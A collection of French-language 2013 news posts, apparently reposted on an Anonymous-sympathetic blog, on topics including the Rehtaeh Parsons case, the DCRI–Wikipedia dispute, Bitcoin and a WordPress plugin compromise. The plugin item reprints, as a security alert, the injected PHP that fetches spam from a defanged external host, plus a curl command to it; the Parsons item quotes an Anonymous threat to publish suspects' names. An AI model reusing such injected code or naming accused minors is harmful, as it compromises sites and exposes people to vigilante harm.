8

Le père de la jeune Reataeh remercie anonymous pour son aide relative à la réouverture de l’enquête.

-

Le père de Rehtaeh Parsons a remercié le groupe Anonymous pour son rôle dans la réouverture du dossier concernant le viol de sa fille par 4 personnes et son suicide après des intimidations sur internet.

Le père de Rehtaeh Parsons, Glen Canning, grâce Anonyme pour son rôle dans l'affaire soit rouverte.

«Je tiens à dire merci à Anonymous pour s’être impliqué dans le cas de ma fille», écrit Glen Canning dans billet de blog.

il remercie Anonymous d’être la force motrice de nouvelles informations transmises aux enquêteurs ainsi que  pour leur soutien en ayant attiré l’attention sur les quatre garçons qui auraient violé Rehtaeh en Novembre 2011.

« Je n’oublierai pas cela », a écrit Canning.

rappel des faits dévoilés par Anonymous :

http://pastebin.com/a8GtD7eg

 

traduction approximative de google :

Salutations de Anonymous.

S’il vous plaît soyez conscient des faits suivants:

1) L’un des violeurs présumés a fait plusieurs déclarations publiques en admettant avoir eu des relations sexuelles avec Raetaeh la nuit en question. Il admet qu’elle était ivre au moment, et également qu’elle a vomi pendant l’acte.

2) Au cours de sa confession, il nomme trois autres garçons et admet que eux aussi se sont relayés et ont eu des rapports sexuels avec Rahtaeh cette nuit-là aussi. Les noms correspondent à ceux que nous avons confirmé lors de notre enquête.

3) La personne qui fait cette confession est le même garçon identifiés dans la photographie. Il a également admis avoir été sur la photo et le nom du complice qui a pris la photo.

4) Tous les renseignements, y compris les captures d’écran de la confession, ont été mis à la disposition de la police.

5) Deux garçons ont été mis en cause à plusieurs reprises que nous pensons être innocent sur la base de nombreux témoignages de personnes ayant une connaissance de première main des événements.

6) Il ya plusieurs témoins qui étaient camarades de classe des violeurs présumés qui peuvent confirmer que ceux sont eux qui leur ont montré la photo de Rehtaeh.

7) Dans la maison, au moins une d’une demi-douzaine d’élèves mineurs consommant de l’alcool se sont engagé dans des relations sexuelles. Qu’est-il arrivé dans cette maison résultant de la propagation de la pornographie juvénile.  Aucune accusation n’a été déposée en ce qui concerne ce sujet.

Pourquoi anonymous s’est-il impliquée dans cette affaire? Nous sommes impliqués parce que les faits ci-dessus montrent clairement que plusieurs crimes ont été commis en Nouvelle-Écosse. Une jeune fille de 17 ans s’est tué parce que la police n’a pas réussi à faire leur travail et de charger une seule personne pour l’un d’eux.

Est-il nécessaire pour Anonymousde s’ impliquer dans cette affaire? Oui.  Nous sommes un groupe de citoyens concernés par l’injustice de notre système. Nous avons pris sur nous de souligner que l’injustice au public et nous demandons à la police de corriger leur manipulation incorrecte de cette affaire – une jeune fille est déjà mort de ces suites.

Une image d’une jeune fille de 15 ans ayant des relations sexuelles était partagé dans la Cole Harbour District High School. Ni l’école, ni la police ne le conteste. Par définition juridique cette image est de la pornographie juvénile. Selon certaines estimations, des centaines de personnes ont déjà vu la photo, y compris de nombreux adultes. La police a vu la photographie. Le fait que cette preuve ai été écartée comme non convenable pour tout type d’arrestation par la police est inadmissible.

Ce que les policiers disent aux citoyens de la Nouvelle-Écosse est clair: Avoir des élèves mineurs qui boivent et ont des relations sexuelles dans votre maison n’est pas un crime dans notre communauté.

des Photographies d’une jeune fille de 15 ans ayant des relations sexuelles n’est pas la pornographie enfantine, mais même si c’est le cas, la distribution de la pornographie juvénile n’est pas un crime.

Une jeune fille de 15 ans devrait être capable de donner son consentement a des relations sexuelles, même au si elle est ivre au point de vomir par la fenêtre pendnat a durée de l’acte – ce n’est pas une agression sexuelle.

Nous demandons instamment à la GRC d’agir comme gardiens, donnezz le bon exemple pour les jeunes gens de la Nouvelle-Écosse et envoyer un message clair: ce comportement ne sera pas toléré dans nos communautés.

Les femmes et les jeunes filles de la Nouvelle-Écosse ne devraient pas avoir à vivre dans la peur ou être forcé de dissimuler les preuves d’un viol, car ils seront appelés putes.

Comme nous l’avons déjà mis en garde, les identités de ces personnes ont déjà commencé à circuler en ligne indépendante de nos propres actions. Nous avons fait de notre mieux pour garder ces noms ne soient pas jeté en patûre.

Deux jeunes hommes sont impliqués dans un crime, nous savons qu’ils n’ont pas commis. Est-il illégal pour nous de libérer leurs identités et de faire savoir au monde qu’ils sont innocents? Quelle justice seront mis à leur disposition une fois que leurs noms sera calomniés dans le monde et pourl’etrenité?

Ce n’est pas à la police de décider si les faits présentés ici ne constituent pas un crime. C’est la responsabilité d’un jury. Une allégation d’agression sexuelle est réalisés. Il ya des preuves photographiques de celle-ci. Il est un aveu que de la pornographie juvénile a été distribué dans toute la communauté. L’une des personnes qui devraient être imputés n’a même pas contesté ces faits. Nous demandons – non, nous exigeons: Laissez un jury de décider. Suivez vos propres procédures et protéger les innocents.

Nous ne cherchons pas de justiciers. Si ceux qui nous semblent coupables seront exonérés devant une cour de justice, Anonymous va disparaître de la Nouvelle-Écosse.

Si nous décidons de publier les noms d’un délai seront déclarées au moins une semaine à l’avance.

Nous sommes Anonymous Nous sommes légion. L’honnête nous soutenir. Les corrompus nous craignent. L’héroïque se joindre à nous. Attendez-vous à nous.

0

La mission Lescure a déjà englouti 22 000 euros (et c 'estpas fini..) [pcinpact]

-

Combien coûte la mission Lescure ? D’après Aurélie Filippetti, 22 000 euros ont déjà été dépensés. La locataire de la Rue de Valois table sur un budget maximal de 30 000 euros. Un chiffre qui ne prend toutefois pas en compte les agents et les locaux du ministère de la Culture mis à la disposition de l’ancien PDG de Canal +. 

culture lescure

 

Aurélie Filippetti vient en effet de répondre. Voici ce qu’elle vient de dévoiler :

  • Moyens financiers : 22 000 euros de crédits ont été consommés au 25 février 2013. Sont ici visés : les « frais de mission, impression/reprographie, location d’espaces, sonorisation… »
  • Moyens matériels : la mission Lescure peut utiliser les locaux du ministère de la Culture, et plus précisément une « salle de réunion de l’immeuble des bons-enfants 182, rue Saint-Honoré Paris 1er », qui lui sert pour ses auditions. « Elle a, par ailleurs, bénéficié de l’appui du service logistique du ministère », ajoute la locataire de la Rue de Valois.
  • Moyens humains : deux agents rémunérés par le ministère de la Culture ont été mis à la disposition de la mission Lescure. « L’un sur contrat (article 4-2 groupe 3) de 7 mois à compter du 1er septembre 2012, l’autre détaché sur contrat au ministère à compter du 1er octobre 2012 jusqu’au 31 mars 2013 ». À ces deux personnes, s’ajoute selon Aurélie Filippetti « la participation ponctuelle d’agents du ministère de la culture et de la communication, notamment du service des affaires juridiques et internationales ».

La ministre précise enfin le budget total de la mission, qui « ne devrait pas dépasser 30 000 €, hors prise en charge des personnels rémunérés sur contrats évoqués ci-dessus ». 

Rien n’est dit toutefois quant à la rémunération éventuelle de Pierre Lescure et de son équipe (composée notamment de trois rapporteurs et trois experts).

 

On regrettera également le manque de précision d’Aurélie Filippetti s’agissant des moyens financiers mis à disposition de la mission Lescure. 

Leur montant est d’ailleurs assez étonnant au regard de l’appel d’offres lancé cet été par la Rue de Valois en vue d’accompagner sur le Web la mission Acte 2. Pour un blog, un mini-site et des captations vidéo, le ministère de la Culture proposait jusqu’à 61 000 euros d’argent public

 

Rappelons enfin que la mission Lescure, qui devait initialement rendre ses conclusions fin mars, ne les dévoilera finalement que le mois prochain

http://www.pcinpact.com/news/79118-la-mission-lescure-a-deja-englouti-22-000-euros.htm

1

Les députés s'emparent de l'affaire DCRI / Wikipédia

-

Après Christian Paul, c’est au tour des élus Lionel Tardy (UMP) et Marie-Anne Chapdelaine (PS) de s’intéresser à l’affaire opposant la DCRI à la fondation Wikimédia. Dans des questions écrites, les parlementaires demandent à Manuel Valls des éclaircissements et le détail des mesures envisagées pour éviter ce genre d’incidents à l’avenir.

À gauche comme à droite, l’affaire ayant opposé la Direction centrale du renseignement intérieur (DCRI) à la fondation Wikimédia intéresse grandement les parlementaires. Après laquestion écrite posée la semaine dernière par le député socialiste Christian Paul au ministre de l’intérieur, c’est au tour de Lionel Tardy, élu UMP, et de Marie-Anne Chapdelaine, parlementaire socialiste, d’interpeller Manuel Valls.

Rappel des faits. La DCRI, principale agence de renseignement de la police française, a cherché à obtenir la suppression de l’article consacré à la station hertzienne militaire de Pierre-sur-Haute de la version francophone de Wikipédia. Invoquant le secret défense mais sans préciser les passages posant problème, la DCRI a d’abord suivi la voie juridique classique.

Devant le refus de la fondation Wikimédia d’accéder à sa demande, la DCRI a changé de tactique. Elle a repéré un administrateur et l’a convoqué pour l’obliger à supprimer l’article en question. Une fois libéré, le bénévole a alerté les autres administrateurs pour les prévenir des risques encourus s’ils remettent la page en ligne. Celle-ci est néanmoins revenue, accompagnée d’un effet Streisand.

Dans sa question écrite, publiée ce jour au Journal officiel, le député Lionel Tardy relève la « méconnaissance, de la part de la DCRI, des usages numériques et du fonctionnement de l’encyclopédie en ligne Wikipédia » d’autant que « cette tentative, réalisée en dehors de toutes les règles légales pour le retrait de contenus en ligne« . En outre, l’approche de la DCRI « a eu un effet inverse à celui qui était recherché« .

Le parlementaire de Haute-Savoie aimerait ainsi connaître quels enseignements le gouvernement a tiré de cet incident et quelles sont les mesures qui seront mises en œuvre pour empêcher sa réitération à l’avenir. De son côté, l’élue de d’Ille-et-Vilaine s’étonne des « menaces à l’encontre de l’administrateur bénévole » et de la « démarche des gens à l’initiative de ces pressions« .

Réclamant le respect de « l’État de droit et la liberté d’information« , la députée souhaite connaître « les actions qui seront mises en oeuvre afin que soient pleinement respectés les droits des citoyens à s’informer et à informer et, en ce cas précis, sur la légalité des méthodes employées afin de contraindre l’administrateur à la suppression de cette publication« .

( photo : CC BY-NC OpGraffiti )

Article diffusé sous licence Creative Common by-nc-nd 2.0, écrit par Guillaume Champeau pour Numerama.com

1

Alerte plugin "social-media-widget". 930 000 wordpress en danger!

-

Si vous utilisez le plug-in Widget médias sociaux (social-media-widget), veillez à le retirer immédiatement de votre site web. Nous avons découvert qu’il est utilisé pour injecter le spam dans les sites Web et il a également été supprimé du référentiel Plugin WordPress .

Ceci est un plugin très populaire avec plus de 900.000 téléchargements. Il a le potentiel d’avoir un impact sur beaucoup de sites Web.

Screen Shot 09/04/2013 au 11/03/12 AM

Détails techniques

Le plugin a un appel caché menant à  l’adresse suivante: httx :/ / i.aaur.net / i.php, qui est utilisé pour injecter « Pay Day Loan » spam dans les sites Web exécutant le plugin. 

Le code malveillant a été ajouté il ya seulement 12 jours quand ils ont lancé la version 4.0 du plugin. Nous recommandons donc que tout le monde enlève ce plugin immédiatement avant que nous ayons plus d’informations. 

voici le code malveillant qui a été ajouté au plugin:

470 
471 $ smw_url = « hxxp :/ / i.aaur.net / i.php »; 
472 if {(function_exists (« smw_get »)!) 
fonction smw_get 473 ($ f) { 
réponse wp_remote_get = 474 $ ($ f) , 
475 cas (is_wp_error ($ response)) { 
476 smw_get_body fonction ($ f) { 
477 $ ch = @ curl_init (); 
478 @ curl_setopt ($ ch, CURLOPT_URL, $ f) 
@ 479 curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, vrai), 
480 $ @ output = curl_exec ($ ch); 
curl_close @ 481 ($ ch); 
482 return $ sortie; 
} 483 
484 écho smw_get_body ($ f); 
485} else { 
echo $ 486 response [‘corps’] , 
487} 
488} 
489 smw_get (smw_url $) 
490}

Le code lui-même est très simple. Vous pouvez voir où ils tirent l’url illicite sur la ligne 471. Le reste n’est que gestion des erreurs et d’incorporation de l’injection.

En fait, si vous voulez l’essayer en toute sécurité, il suffit d’ouvrir votre terminal convivial et lancez:

curl -D – hxxp://i.aaur.net/i.php

Vous obtiendrez quelque chose comme ceci:

Screen Shot 09/04/2013 au 29/10/13 AM

Vous pouvez clairement voir l’injection et en retour le SPAM injecté. Or, dans ce cas vous ne faites que voir  l’injection, mais une fois que cela est intégré dans votre site, il se cache parmi tous vos autres codes, ce qui rend difficile pour vous en tant que propriétaire du site à le trouver. 

http://blog.sucuri.net/2013/04/wordpress-plugin-social-media-widget.html

0

Le gouvernement et la DCRI sommé de s’expliquer sur les pressions exercées pour censurer Wikipédia! (pcinpact)

-

Le gouvernement va bientôt devoir s’expliquer des pressions exercées par la DCRI a l’encontre d’un membre français de Wikimedia, et ce afin d’obtenir la suppression d’urgence d’une page de la version francophone de Wikipedia. 

C’est en tout cas ce que réclame aujourd’hui le député Christian Paul au travers d’une question parlementaire.(disponible sur son blog),

Page que la DCRI souhaitait retirer : http://fr.wikipedia.org/wiki/Station_hertzienne_militaire_de_Pierre-sur-Haute

 

paul dcri

«  l’association Wikimedia France a fait état de pressions exercées par la Direction Centrale du Renseignement Intérieur (DCRI) sur son Président, M. Rémi Mathis, pour obtenir la suppression d’un article concernant la station hertzienne militaire de Pierre-sur-Haute, publié dans la version française de l’encyclopédie collaborative Wikipédia.

  Cette action de la DCRI soulève plusieurs questions  les service de renseignement ont  demandé le retrait d’un article dont le contenu se borne à agréger des informations publiques, la principale source étant un reportage sur la station diffusé par la chaîne locale « Télévision Loire 7 » , toujours disponible en ligne. « 

 Manuel Valls est ainsi sommé d’indiquer « sur quelles bases légales la DCRI a agi ».

 http://www.pcinpact.com/news/79019-le-gouvernement-somme-s-expliquer-sur-l-affaire-dcriwikipedia.htm

0

Crack Bitcoin! Bitcoin vient de perdre 50% de sa valeur !!!

-


Après une flambée spéculative à 266 dollars, cette monnaie virtuelle s’est effondrée en quelques heures, mercredi, pour se stabiliser à 125 dollars.
un point tel que MtGox, la principale place d’échange de bitcoins, a fermé ses portes pour douze heures, jeudi, le temps de mettre à jour ses infrastructures malmenées par l’afflux de la demande et par des cyberattaques. Le site devrait rouvrir à 4h du matin, vendredi (heure de Paris).
Bitcoin, cest une monnaie électronique et cryptée qui n’est liée à aucune banque centrale.

Alors que les articles dans la presse se multiplient, les bitcoins s’arrachent. MtGox explique que ses infrastructures n’ont pas résisté à la demande.

Le site semble également avoir été victime d’attaques en déni de service ayant paralysé ses serveurs, une arme utilisée par des cybercriminels pour provoquer la panique et racheter au plus bas.

Investir dans le bitcoin est un pari risqué, avertissent de nombreux experts.

Plusieurs portefeuilles virtuels, comme InstaWallet, ont été piratés.

En septembre dernier, un hacker a réussi à dérober l’équivalent de 250.000 dollars sur le marché BitFloor.

Le FBI a été saisi mais les clients touchés n’ont pas beaucoup d’espoirs de revoir leur argent.

http://www.20minutes.fr/high-tech/1136245-20130411-monnaie-electronique-bitcoin-victime-crach

 

0

Injurier en privé sur Facebook peut valoir 38 euros d'amende

-

Tout en reconnaissant que les injures publiées sur une page privée de Facebook ne pouvaient pas être condamnées au titre de l’injure publique, la cour de cassation a prévenu dans un arrêt rendu ce mercredi qu’il reste possible de condamner les auteurs pour injure non publique, à une amende de 1ère classe.

La cour de cassation fixe un début de jurisprudence concernant la responsabilité pénale des internautes qui commettent des injures sur Facebook ou tout autre réseau social. Dans un arrêt du 10 avril 2013 rendu par la première chambre civile, la Cour a estimé que le fait d’injurier un individu ou une entreprise sur Facebook ou MSN ne relevait pas de l’injure publique dès lors que seuls les amis ou membres pouvaient lire les propos litigieux.

« Après avoir constaté que les propos litigieux avaient été diffusés sur les comptes ouverts par Mme Y… tant sur le site Facebook que sur le site MSN, lesquels n’étaient en l’espèce accessibles qu’aux seules personnes agréées par l’intéressée, en nombre très restreint, la cour d’appel a retenu, par un motif adopté exempt de caractère hypothétique, que celles ci formaient une communauté d’intérêts« , constate la Cour. Elle conclut donc que les juges d’appel ont « exactement déduit que ces propos ne constituaient pas des injures publiques« .

En cela, la plus haute juridiction conforte les juges des prud’homme de Boulogne-Billancourt, qui avaient décidé en 2010 (dans une toute autre affaire) de condamner des salariés qui avaient critiqué leur entreprise sur le réseau social, parce que les propos avaient été publiés sur un « mur » visible publiquement. De même, le 15 novembre 2011, la Cour d’appel de Besançon avait établi cette distinction entre les « murs » publics, et les proposés limités aux seuls amis, ce qui est constant depuis.

Pour licencier un salarié pour les propos tenus sur sa page Facebook,l’employeur doit faire la preuve que le profil est public.

Mais la cour de cassation a ouvert une porte. Dans son arrêt, elle note en effet que « la cour d’appel s’est bornée à constater que les propos litigieux ne constituaient pas des injures publiques« , alors qu’il lui fallait « rechercher si les propos litigieux pouvaient être qualifiés d’injures non publiques« .

En effet, l’article R621-2 du code pénal prévoit une peine de 38 euros d’amende pour « l’injure non publique envers une personne, lorsqu’elle n’a pas été précédée de provocation« . Si la loi contre les injures publiques s’était appliquée, c’est 12 000 euros d’amende qui étaient encourus.

En l’espèce, il était reproché à la salariée d’avoir écrit des messages comme « sarko devrait voter une loi pour exterminer les directrices chieuses comme la mienne », « éliminons nos patrons et surtout nos patronnes (mal baisées) qui nous pourrissent la vie », ou encore « Y’en a marre des connes ». 38 euros pour se soulager.

Article diffusé sous licence Creative Common by-nc-nd 2.0, écrit par Guillaume Champeau pour Numerama.com
5

NABILLA dépose sa phrase "allo t’as pas de shampoing" à l’INPI

-

 

Nabilla vient de déposer à l’INPI sa plus belle création et propriété intellectuelle : son « Allo, t’es une fille t’as pas de shampoing ?… »

Selon les informations du site Le petit musée des marques, Nabilla est allée déposer la marque suivante : « Allo, t’es une fille t’as pas de shampoing c’est comme si t’es une fille t’as pas de cheveux. 

Cette enregistrement devrait lui permettre d’empêcher qui que ce soit d’utiliser cette phrase à moins évidemment de reverser des confortables royalties à la jeune femme.

Désolé pour ce sympathique site « entre défenseurs du net » qui à cause de moi va devoir reverser des droits d’auteurs à Nabilla^^

Vous allez voir que bientôt, le simple fait de répondre au téléphone avec une voix de bimbo vous coûtera de l’argent…

1

Un cheval de Troie transforme votre PC en générateur de #bitcoins

-
Avec un cours de change qui dépasse désormais les 150 euros, le « bitcoin » aiguise de nombreux appétits, en particulier criminels. L’une des particularités de cette monnaie virtuelle, est que chaque utilisateur peut théoriquement générer des bitcoins. Mais en réalité, il faut aujourd’hui une importante puissance de calcul pour y arriver : utiliser son propre petit PC ne suffit pas.
D’où l’idée, qu’ont eu certains cybercriminels, d’utiliser les PC des autres. En effet, le laboratoire Kaspersky vient de mettre la main sur un nouveau cheval de Troie qui, une fois téléchargé, installe et lance le processus bitcoin pour générer de la monnaie. La diffusion du cheval de Troie se fait par hameçonnage, au travers d’un message Skype qui vous incite à cliquer sur un lien (« voici une photo de vous »). Cet enrichissement illicite  n’est, toutefois, pas très discret car le processus bitcoin va consommer un maximum de ressources CPU, ce qui provoquera un ralentissement de la machine. Un coup d’œil dans le gestionnaire des tâches suffira pour détecter le logiciel indésirable.
http://www.01net.com/editorial/592535/un-cheval-de-troie-transforme-votre-pc-en-generateur-de-bitcoins/
0

#opIsrael : Les forces de sécurité jordaniennes ont arrêté plusieurs jeunes présumé Anonymous

-

Les forces de sécurité jordaniennes ont arrêté plusieurs jeunes qui sont soupçonnés d’attaquer des sites internet israéliens dans le cadre de la cyber-attaque de grande envergure sur Israël déclarés par le groupe appelé Anonymous.

En réponse, Anonymous a menacé d’attaquer des sites internet jordaniens. Le groupe a exigé la libération immédiate des militants.

http://www.israelnationalnews.com/News/News.aspx/166857#.UWRz0KLxrOI

0

Communiqué #OpBigBrother.fr

-

Communiqué #OpBigBrother.fr

Nous constatons au sein de la communauté francophone se disant Anonymous IRL (In Real Life) une erreur, voire même un fourvoiement sur le positionnement vis-à-vis de l’ #OpBigBrother et de l’action #IDP13.
En effet, ces journées d’actions visent et appellent les anons du monde entier à informer sur l’importance du respect de la vie privée et de la liberté d’expression.
INDECT est un projet de surveillance qu’il convient de noter et sur lequel il nous faut informer quant aux risques auxquels serait exposée la vie privée s’il venait à être mis en oeuvre. Ce ne doit pas être le sujet central des journées d’action IDP (International Days for Privacy – Journées Internationales pour la Vie Privée).
bigbroIl est primodial de former le plus grand nombre sur l’importance du respect de la vie privée, d’éduquer sur les outils de chiffrement, de préservation de l’anonymat et sur la vigilance à avoir dans l’usage des réseaux sociaux.
Ces réseaux, utiles pour certains pour l’organisation et l’information, restent les meilleurs outils de surveillance qu’il convient d’appréhender avec sérieux et savoir-faire.
Il est essentiel d’éduquer sur ce type d’usages et sur l’impact réel sur la vie privée pour faire comprendre l’intérêt de l’action sur des projets comme INDECT.
A défaut, les populations rencontrées resteront dans une position d’attente de passage de loi pour agir, mais il sera peut-être trop tard.
C’est dans ce but que les journées IDP ont été lancées au niveau mondial : éducation, formation et information.
Nous respectons l’action de ceux qui agissent sur le terrain et des risques qu’ils prennent, certains d’entre nous agissant online & AFK (Away From Keyboard).
Mais il est capital qu’une discussion de fond entre tous ait lieu pour l’organisation et la cohésion du message. Malheureusement, cela ne peut se faire sur un réseau représentant ce que précisément nous combattons.
Nous vous invitons donc à nous rejoindre sur IRC pour discuter, débattre et organiser l’action.
Anonymous a toujours organisé ses opérations depuis l’IRC et non sur Facebook, ce n’est pas un hasard.
Nous avons mis en place un lien direct pour vous connecter à notre serveur directement depuis votre navigateur web en tapant : http://irc.prooops.eu:9090/?channels=#OpBigBrother.fr
Vous trouverez également des tutoriaux et informations sur : http://fr.anonpedia.net
Travaillons ensemble pour unir nos forces et transmettre un discours cohérent !
Nous sommes Anonymous
Nous sommes Légion
Nous ne pardonnons pas
Nous n’oublions pas
Expect Us !
0

Twitter encore sommé de livrer l'identité d'un internaute français

-

Le tribunal de grande instance de Paris a ordonné à Twitter de livrer à un plaignant l’identité d’un internaute qui s’était fait passer pour lui sur le réseau social. La société, qui refuse d’obtempérer, devra payer 500 euros d’indemnités par jour de retard.

En l’espèce, il s’agit d’un internaute accusé d’avoir usurpé l’identité d’un tiers, pour diffuser des messages en se faisant passer pour lui. 

Depuis la promulgation de la loi Loppsi, le code pénal prévoit un très large délit d’usurpation d’identité, puni d’un an d’emprisonnement et de 15 000 euros d’amende.

Comme à son habitude, Twitter refuse de communiquer les données en sa possession à la justice française, au prétexte qu’elles seraient hébergées aux Etats-Unis et ne seraient donc pas soumises aux lois françaises. 

De façon originale et contestable, le tribunal se fonde sur l’article 809 du code de procédure civile, qui permet au président du TGI de prescrire toutes mesures qui permettent de « prévenir un dommage imminent« , ou de « faire cesser un trouble manifestement illicite« . 

Or dans cette affaire, le compte Twitter en cause a déjà été supprimé par l’éditeur du réseau social, et il n’y a donc plus de trouble à faire cesser. 

Pour tenter d’obliger Twitter à obtempérer, le tribunal a ordonné une astreinte de 500 euros par jour de retard. L’addition pourrait ainsi être lourde, si jamais le réseau social était effectivement condamné un jour.

Article diffusé sous licence Creative Common by-nc-nd 2.0, écrit par Guillaume Champeau pour Numerama.com